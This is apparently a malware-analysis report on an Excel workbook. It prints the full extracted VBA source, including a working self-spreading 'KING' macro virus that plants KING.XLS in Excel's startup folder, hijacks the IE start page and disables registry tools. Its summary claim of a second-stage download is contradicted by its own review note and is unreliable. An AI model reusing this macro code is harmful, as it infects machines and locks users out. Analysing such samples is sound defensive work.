MALICIOUS
218
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
The sample is an Excel document containing VBA macros. Heuristics indicate the use of WScript.Shell and CreateObject, suggesting the execution of arbitrary commands. The presence of an Auto_Open macro further supports the intent to execute malicious code upon opening. The script likely downloads and executes a second-stage payload from the embedded URL.
Heuristics 8
-
VBA macros detected — medium — 5 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
WScript.Shell usage — critical — OLE_VBA_WSCRIPT: WScript.Shell usage. Matched line in script:
Set OperationRegistry = CreateObject("WScript.Shell") -
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script:
Set OperationRegistry = CreateObject("WScript.Shell") -
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Auto_Open macro — low — OLE_VBA_AUTO: Auto_Open macro. Matched line in script:
Private Function auto_open() -
Auto_Close macro — low — OLE_VBA_AUTOCLOSE: Auto_Close macro. Matched line in script:
Private Function auto_close() -
Reference to Windows Script Host — high — SC_STR_WSCRIPT: Reference to Windows Script Host
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.cjx.com.cn/Default.aspx�]� In document text (OLE body)
- http://3azu.taobao.comIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16891 bytes |

SHA-256: b7597912d64f3e3a95b2d3c12a151f2b939f800d24aac84cbdfb9ae9f9a6c581
Preview script — first 1,000 lines of the extracted script
' Decoded VBA source carved by olevba; the extractor concatenates every module of the
' project, so each "Attribute VB_Name" line below starts a new module.
' The modules in this first run (Tab4SB7, CJXGys_WorkBook, Tab1, Tab2, Tab3, Tab3Y, Tab5)
' consist of attribute lines only - they contain no executable code.
' VB_Base presumably identifies the host object type (00020820... for worksheet
' modules, 00020819... for the workbook module) - confirm against Excel type library.
Attribute VB_Name = "Tab4SB7"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Workbook-level module: attributes only, no code.
Attribute VB_Name = "CJXGys_WorkBook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tab1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tab2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tab3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tab3Y"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tab5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Module1: the legitimate-looking print/pagination helpers of the template.
' No "Option Explicit" appears in this module, so undeclared locals used further
' down (e.g. in PrintPreview) are implicitly Variant.
Attribute VB_Name = "Module1"
'Beijing Chengjiexun Application Software Technology Co., Ltd.
'Tel: 010-58731022/3/4/5/6
'Author: 何仲珩 (He Zhongheng)  QQ: 709539682
'The VBA here is hobby-grade work, 2010-3-27
' "Show all sheets": makes every worksheet from index 2 onward visible (-1 = visible).
' Index 1 is deliberately skipped. Bound to a menu item by auto_open below.
Private Function 显示所有Sheet()
Dim a As Integer
For a = 2 To Worksheets.count
Worksheets(a).Visible = -1
Next
End Function
' "Hide all sheets": hides every worksheet from index 2 onward (0 = hidden),
' leaving only the first sheet visible. Counterpart of 显示所有Sheet.
Private Function 关闭所有Sheet()
Dim a As Integer
For a = 2 To Worksheets.count
Worksheets(a).Visible = 0
Next
End Function
' Auto_Open-named procedure (Excel runs a procedure of this name when the workbook opens).
' Adds a "成捷迅附加菜单" (Chengjiexun add-on menu) to the worksheet menu bar whose items
' call the CJX* print helpers and the show/hide-all-sheets helpers in this module.
' On Error Resume Next turns a failed menu lookup into Nothing instead of an error;
' if the menu already exists the function returns without adding items again.
' NOTE(review): the "KING" module at the end of this listing also defines auto_open
' (as a public Sub); which of the two Excel runs at open cannot be determined from the
' listing alone - confirm by detonation.
Private Function auto_open()
Dim menuMain As Menu, mainmenu
On Error Resume Next
mainmenu = "成捷迅附加菜单(&C)"
Set menuMain = MenuBars(xlWorksheet).Menus(mainmenu)
If menuMain Is Nothing Then
MenuBars(xlWorksheet).Menus.Add Caption:=mainmenu
Else
Exit Function
End If
' Each item is (caption, macro name); "--" entries are separators.
With MenuBars(xlWorksheet).Menus(mainmenu).MenuItems
.Add "打印预览当前页(&W)", "CJXPrintPreview"
.Add "打印当前页(&P)", "CJXPrint"
.Add "全部打印可见页面(&A)", "CJXPrintAll"
.Add "--"
.Add "设置每页打印行数(&S)", "CJXSetLineCount"
.Add "关闭每页打印行数页面(&C)", "CJXCloseLineCountPage"
.Add "--"
.Add "显示所有页--设置模板时使用(&I)", "显示所有Sheet"
.Add "关闭所有页--设置模板时使用(&V)", "关闭所有Sheet"
.Add "--"
.Add "关于(&A)", "CJXAbout"
End With
End Function
' Auto_Close-named procedure (runs when the workbook closes): resets command bar 1.
' Presumably intended to drop the menu that auto_open added - the menu was created
' through the legacy MenuBars API, so whether this Reset removes it is not shown here.
Private Function auto_close()
Application.CommandBars(1).Reset
End Function
' Menu action: unhides and activates the "打印行数" (rows per page) configuration sheet.
Private Function CJXSetLineCount()
With Worksheets("打印行数")
.Visible = -1
.Activate
End With
End Function
' Menu action: hides the "打印行数" (rows per page) configuration sheet again.
Private Function CJXCloseLineCountPage()
Worksheets("打印行数").Visible = 0
End Function
' Menu action: shows the "About" dialog (UserForm1, whose only handler hides it again).
Private Function CJXAbout()
UserForm1.Show
End Function
' Looks up the configured rows-per-page for ws.
' Walks column A of the PrintLineCount sheet from row 1 until the first blank cell;
' when a cell equals ws.name, returns CInt of that row's column B. Returns 0 when the
' sheet is not listed (callers treat 0 as "print unchanged").
' NOTE(review): PrintLineCount is a sheet code name not visible in this listing -
'   presumably the "打印行数" sheet used by CJXSetLineCount; confirm.
' CInt raises a runtime error if column B is not numeric; there is no handler here.
Private Function GetLineCount(ws As Worksheet) As Integer
Dim nRow As Integer, strText As String
nRow = 1
While True
strText = PrintLineCount.Cells(nRow, 1).Text
' First blank cell in column A terminates the search.
If Len(Trim(strText)) = 0 Then
GetLineCount = 0
Exit Function
End If
If strText = ws.name Then
GetLineCount = CInt(Trim(PrintLineCount.Cells(nRow, 2).Text))
Exit Function
End If
nRow = 1 + nRow
Wend
End Function
' Returns the last row number of ws's print area.
' Assumes PrintArea is an absolute range such as "$A$1:$H$50": skips past ":" and the
' column's "$" (nIndex + 2), then takes the digits after the row's "$" (-> 50).
' Nothing guards against a missing ":"/"$" or a non-numeric tail; CInt may raise.
Private Function GetPrintRow(ws As Worksheet) As Integer
Dim strPrintArea As String
strPrintArea = ws.PageSetup.PrintArea
Dim nIndex As Long
nIndex = InStr(1, strPrintArea, ":")
strPrintArea = Mid(strPrintArea, nIndex + 2)
nIndex = InStr(1, strPrintArea, "$")
GetPrintRow = CInt(Mid(strPrintArea, nIndex + 1))
End Function
' Returns the first data row below the repeated title rows: parses
' PageSetup.PrintTitleRows (assumed of the form "$1:$5" -> 5) and adds 1.
' As in GetPrintRow, the parsing is unguarded.
Private Function GetStartRow(ws As Worksheet) As Integer
Dim strPrintHead As String
strPrintHead = ws.PageSetup.PrintTitleRows
Dim nIndex As Long
nIndex = InStr(1, strPrintHead, ":")
strPrintHead = Mid(strPrintHead, nIndex + 2)
GetStartRow = CInt(strPrintHead) + 1
End Function
' Reads the starting page number from cell D21 of the BaseInfo sheet.
' Returns -1 when the cell is blank or when CInt fails (errHandler);
' PrintPreview treats a value > 0 as "continuous page numbering across sheets".
Private Function GetStartIndex() As Integer
On Error GoTo errHandler
Dim str As String
str = Trim(BaseInfo.Cells(21, "D").Text)
If Len(str) = 0 Then
GetStartIndex = -1
Else
GetStartIndex = CInt(str)
End If
Exit Function
errHandler:
GetStartIndex = -1
End Function
' Clears all six header/footer sections of ws.
' Not called anywhere in this listing; PrintPreview repeats the same block inline.
Private Function SetPageSetup(ws As Worksheet)
With ws.PageSetup
.LeftHeader = ""
.CenterHeader = ""
.RightHeader = ""
.LeftFooter = ""
.CenterFooter = ""
.RightFooter = ""
End With
End Function
' True when the sheet name contains "表四甲" (Table 4-A), "材料" (materials) or
' "设备" (equipment); such sheets get a separate running sub-index in PrintPreview.
Private Function CheckTab4(ws As Worksheet) As Boolean
CheckTab4 = InStr(ws.name, "表四甲") > 0 Or InStr(ws.name, "材料") > 0 Or InStr(ws.name, "设备") > 0
End Function
' Prints or previews the active sheet after re-paginating a temporary copy so that every
' page holds exactly nRowCountPerPage data rows, followed by the bottom row(s) and a fresh
' copy of the title rows, with a page label appended to the formula in cell B5.
' bIsPrint: True = PrintOut, False = PrintPreview (default).
' bLockApplication: when True (default) calculation, screen updating and events are
'   switched off for the duration; CJXPrintAll passes False because it does that itself.
' No return value is assigned. "On Error Resume Next" suppresses every runtime error.
' NOTE(review): Application.DisplayAlerts is set to False before ws.Delete and never
'   restored, so alerts stay suppressed after this function returns.
' NOTE(review): iii, nLRow, nSRow, nRowCPerPage, nCRowCount, nSaveStartPage, nMod1, nPs,
'   strOldTiltle, strOld, nThisRowCount and nRow are never declared (implicit Variants).
Private Function PrintPreview(Optional bIsPrint As Boolean = False, Optional bLockApplication = True)
On Error Resume Next
If bLockApplication Then
With Application
.Calculation = xlManual
.ScreenUpdating = False
.EnableEvents = False
End With
End If
Dim wsSave As Worksheet, nRowCountPerPage As Integer
Set wsSave = ActiveSheet
' 0 = sheet not listed on the PrintLineCount sheet: print/preview unchanged, skip to cleanup.
nRowCountPerPage = GetLineCount(wsSave)
If nRowCountPerPage = 0 Then
If bIsPrint Then
wsSave.PrintOut
Else
wsSave.PrintPreview
End If
GoTo EndFunction
End If
' nStartPage comes from BaseInfo!D21; bDa (> 0) enables continuous numbering across sheets.
Dim nStartPage As Integer, bDa As Boolean, bIsTab4 As Boolean, nTab4Index As Integer
nStartPage = GetStartIndex()
bDa = nStartPage > 0
' nBottomRows: rows copied below each page. With the value 1 the "- (nBottomRows - 1)"
' adjustments below are no-ops.
Dim nLastRow As Integer, nBottomRows As Integer
nBottomRows = 1
nLastRow = GetPrintRow(wsSave) - (nBottomRows - 1)
' Continuous numbering: advance nStartPage by the page count of every visible sheet that
' precedes the active one (BaseInfo and PrintLineCount excluded). Sheets matching
' CheckTab4 also advance nTab4Index by the same amount.
If bDa Then
Dim ws1 As Worksheet
bIsTab4 = CheckTab4(wsSave)
nTab4Index = 1
For iii = 1 To Worksheets.count
Set ws1 = Worksheets(iii)
If (ws1.Visible = xlSheetVisible And ws1.name <> BaseInfo.name And ws1.name <> PrintLineCount.name) Then
If (ws1.name = wsSave.name) Then
Exit For
End If
nLRow = GetPrintRow(ws1) - (nBottomRows - 1)
nSRow = GetStartRow(ws1)
nRowCPerPage = GetLineCount(ws1)
' Data rows of that sheet minus 3 - the meaning of the constant 3 is not shown here.
nCRowCount = nLRow - nSRow - 3
nSaveStartPage = nStartPage
' Pages = ceil(nCRowCount / nRowCPerPage), at least 1.
If nRowCPerPage > nCRowCount Then
nStartPage = nStartPage + 1
Else
nMod1 = nCRowCount Mod nRowCPerPage
nPs = (nCRowCount - nMod1) / nRowCPerPage
If nMod1 <> 0 Then
nStartPage = nStartPage + nPs + 1
Else
nStartPage = nStartPage + nPs
End If
End If
If bIsTab4 And CheckTab4(ws1) Then
nTab4Index = nTab4Index + (nStartPage - nSaveStartPage)
End If
End If
Next
End If
Dim nStartRow As Integer
nStartRow = GetStartRow(wsSave)
' All edits happen on a copy inserted before the original; the copy becomes ActiveSheet.
wsSave.Copy before:=wsSave
Dim ws As Worksheet
Set ws = ActiveSheet
Dim nCurRowCount As Integer, nPages As Integer, nMod As Integer, nAdded As Integer, ii As Integer
nCurRowCount = nLastRow - nStartRow
' nMod = rows that would land on the last page.
If nRowCountPerPage > nCurRowCount Then
nMod = nCurRowCount
Else
nMod = nCurRowCount Mod nRowCountPerPage
End If
' Fill the last page by inserting copies of row (nLastRow - 1) ...
If (nRowCountPerPage > nCurRowCount Or nMod > 3) Then
nAdded = nRowCountPerPage - nMod
For ii = 1 To nAdded
If ii = 1 Then
ws.Rows(nLastRow - 1).Select
End If
Selection.Copy
Selection.Insert Shift:=xlDown
Next
' ... unless it would hold only 1-3 rows, which are deleted instead.
ElseIf (nMod > 0 And nMod <= 3) Then
nAdded = 0
For ii = 1 To nMod
nLastRow = nLastRow - 1
ws.Rows(nLastRow).Delete Shift:=xlShiftUp
Next
Else
nAdded = 0
End If
nLastRow = nLastRow + nAdded
nCurRowCount = nLastRow - nStartRow
' nCurRowCount is now a multiple of nRowCountPerPage, so this division is exact.
nPages = nCurRowCount / nRowCountPerPage
' Page label for the first page, appended to the existing formula in B5:
' "-<tab4 index> 第N页" (continuous) or "全页" / "第1页共N页" (page 1 of N).
strOldTiltle = ws.Cells(5, "B").Formula
Dim strTT As String
If bDa Then
If bIsTab4 Then
strTT = """-" & CStr(nTab4Index) & " 第" & CStr(nStartPage) & "页"""
Else
strTT = """-1 第" & CStr(nStartPage) & "页"""
End If
Else
strTT = IIf(nPages = 1, """全页""", """第1页共" & CStr(nPages) & "页""")
End If
ws.Cells(5, "B").Formula = strOldTiltle & "&" & strTT
' Multi-page: at every page boundary insert the bottom row(s) and a copy of the title
' rows, then label that page's B5. Excel's own title-row repetition is switched off
' because the rows are now inserted explicitly.
If nPages > 1 Then
strOld = Replace(ws.PageSetup.PrintTitleRows, "$", "")
nThisRowCount = ws.Rows(strOld).count
ws.PageSetup.PrintTitleRows = ""
For ii = 1 To nPages - 1
ws.Rows(CStr(nLastRow) & ":" & CStr(nLastRow + nBottomRows - 1)).Select
Selection.Copy
nRow = nRowCountPerPage * ii + (nBottomRows + nThisRowCount) * (ii - 1) + nStartRow
ws.Rows(nRow).Select
Selection.Insert Shift:=xlDown
ws.Rows(strOld).Select
Selection.Copy
ws.Rows(nRow + nBottomRows).Select
Selection.Insert Shift:=xlDown
If bDa Then
If bIsTab4 Then
nTab4Index = nTab4Index + 1
strTT = """-" & CStr(nTab4Index) & " 第" & CStr(nStartPage + ii) & "页"""
Else
strTT = """-" & CStr(ii) & "第" & CStr(nStartPage + ii) & "页"""
End If
Else
strTT = """第" & CStr(ii + 1) & "页共" & CStr(nPages) & "页"""
End If
ws.Cells(5 + (nRowCountPerPage + nThisRowCount + nBottomRows) * ii, "B").Formula = strOldTiltle & "&" & strTT
nLastRow = nLastRow + nBottomRows + nThisRowCount
Next
End If
' Clear headers/footers (same as SetPageSetup, inlined here).
With ws.PageSetup
.LeftHeader = ""
.CenterHeader = ""
.RightHeader = ""
.LeftFooter = ""
.CenterFooter = ""
.RightFooter = ""
End With
If bIsPrint Then
ws.PrintOut
Else
ws.PrintPreview
End If
' Return to the original sheet and delete the temporary copy without a prompt.
wsSave.Activate
Application.DisplayAlerts = False
ws.Delete
EndFunction:
If bLockApplication Then
With Application
.Calculation = xlAutomatic
.ScreenUpdating = True
.EnableEvents = True
End With
End If
End Function
' Menu action: preview the active sheet (PrintPreview with its defaults).
Private Function CJXPrintPreview()
PrintPreview
End Function
' Menu action: print the active sheet (PrintPreview with bIsPrint:=True).
Private Function CJXPrint()
PrintPreview bIsPrint:=True
End Function
' Menu action: prints every visible worksheet except BaseInfo and PrintLineCount.
' Each sheet is activated and passed to PrintPreview(True, False); calculation, screen
' updating and events are switched off once here for the whole run and restored at the
' end, and the originally active sheet is re-activated. "On Error Resume Next" hides errors.
Private Function CJXPrintAll()
On Error Resume Next
Dim ii As Integer, ws As Worksheet, wsSave As Worksheet
Set wsSave = ActiveSheet
With Application
.Calculation = xlManual
.ScreenUpdating = False
.EnableEvents = False
End With
For ii = 1 To Worksheets.count
Set ws = Worksheets(ii)
If (ws.Visible = xlSheetVisible And ws.name <> BaseInfo.name And ws.name <> PrintLineCount.name) Then
ws.Activate
Call PrintPreview(True, False)
End If
Next
wsSave.Activate
With Application
.Calculation = xlAutomatic
.ScreenUpdating = True
.EnableEvents = True
End With
End Function
' BaseInfo: worksheet module referenced by GetStartIndex (cell D21); attributes only.
Attribute VB_Name = "BaseInfo"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' UserForm1: the "About" dialog shown by CJXAbout; its single handler follows.
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{717FD4B3-D4B3-432F-8602-1424499BF9F2}{987E6FF5-3125-4C55-B533-5B9C84961820}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Click handler of the form's button: hides the dialog.
Private Sub CommandButton1_Click()
Me.Hide
End Sub
' Further worksheet modules (Tab3Y2, Tab4SB5, Tab4SB8, Tab4, Tab6): attributes only, no code.
Attribute VB_Name = "Tab3Y2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tab4SB5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tab4SB8"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tab4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tab6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' "KING": the module that carries the malicious behaviour in this sample. It has no
' VB_Base line, unlike the worksheet modules above, and is the only module besides
' Module1 and UserForm1 with executable code.
Attribute VB_Name = "KING"
' Auto_Open-named procedure in the KING module (public Sub; Module1 has a private
' auto_open of the same name). Registers ck_files as the sheet-activate handler, so the
' routine below runs every time the user switches sheets - this is the persistence /
' trigger mechanism, not a one-off.
Sub auto_open()
Application.OnSheetActivate = "ck_files"
End Sub
' Sheet-activate handler registered by auto_open. Analyst summary of what it does:
'  p = 1 if KING.XLS already exists in Excel's StartupPath; w = 1 if the active workbook
'  has module sheets (ActiveWorkbook.Modules - presumably the legacy Excel 5/95 module
'  collection). whichfile = p + 10*w selects the branch.
'  Case 10 (no KING.XLS yet, workbook has modules): copies the hidden "KING" sheet into a
'    new workbook, blanks its document properties, saves it as StartupPath\KING.XLS with
'    the window hidden, re-hides the sheet in the source workbook and re-points
'    OnSheetActivate at "KING.XLS!ck_files".
'  Case 1 (KING.XLS present, workbook has no modules): copies the "KING" sheet out of
'    KING.XLS into the active workbook as its first sheet and hides it.
'  Afterwards, unconditionally and with errors suppressed, uses WScript.Shell to set the
'  Internet Explorer Start Page (HKLM and HKCU) to MyUrl and to set
'  HKCU\...\Policies\System\DisableRegistryTools = 1 (REG_DWORD).
' NOTE(review): the URL is only written as the IE Start Page; nothing in this listing
'   downloads or executes anything from it.
' Host artifacts to look for: KING.XLS in the Excel startup folder, a hidden sheet named
' "KING" in other workbooks, and the three registry values written below.
Sub ck_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "KING.XLS") 'results
If m$ = "KING.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
Select Case whichfile
Case 10
' Plant a copy of this sheet as KING.XLS in the startup folder.
Application.ScreenUpdating = False
n4$ = ActiveWorkbook.name
Sheets("KING").Visible = True
Sheets("KING").Select
Sheets("KING").Copy
' Strip document properties from the new workbook.
With ActiveWorkbook
.Title = ""
.Subject = ""
.Author = ""
.Keywords = ""
.Comments = ""
End With
newname$ = ActiveWorkbook.name
c4$ = CurDir()
ChDir Application.StartupPath
ActiveWindow.Visible = False
Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "KING.XLS", FileFormat:=xlNormal _
, Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
False, CreateBackup:=False
ChDir c4$
Workbooks(n4$).Sheets("KING").Visible = False
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "KING.XLS!ck_files"
Case 1
' Copy the sheet from the startup-folder KING.XLS into the current workbook.
Application.ScreenUpdating = False
n4$ = ActiveWorkbook.name
p4$ = ActiveWorkbook.Path
s$ = Workbooks(n4$).Sheets(1).name
If s$ <> "KING" Then
Workbooks("KING.XLS").Sheets("KING").Copy before:=Workbooks(n4$).Sheets(1)
Workbooks(n4$).Sheets("KING").Visible = False
Else
End If
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "KING.XLS!ck_files"
Case Else
End Select
' Registry changes (run on every branch, errors ignored).
Dim OperationRegistry
On Error Resume Next
Set OperationRegistry = CreateObject("WScript.Shell")
MyUrl = "http://3azu.taobao.com"
RegPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Start Page"
OperationRegistry.RegWrite RegPath, MyUrl
RegPath = "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page"
OperationRegistry.RegWrite RegPath, MyUrl
RegPath = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
OperationRegistry.RegWrite RegPath, "1", "REG_DWORD"
Exit Sub 'Under normal operation the procedure exits here
End Sub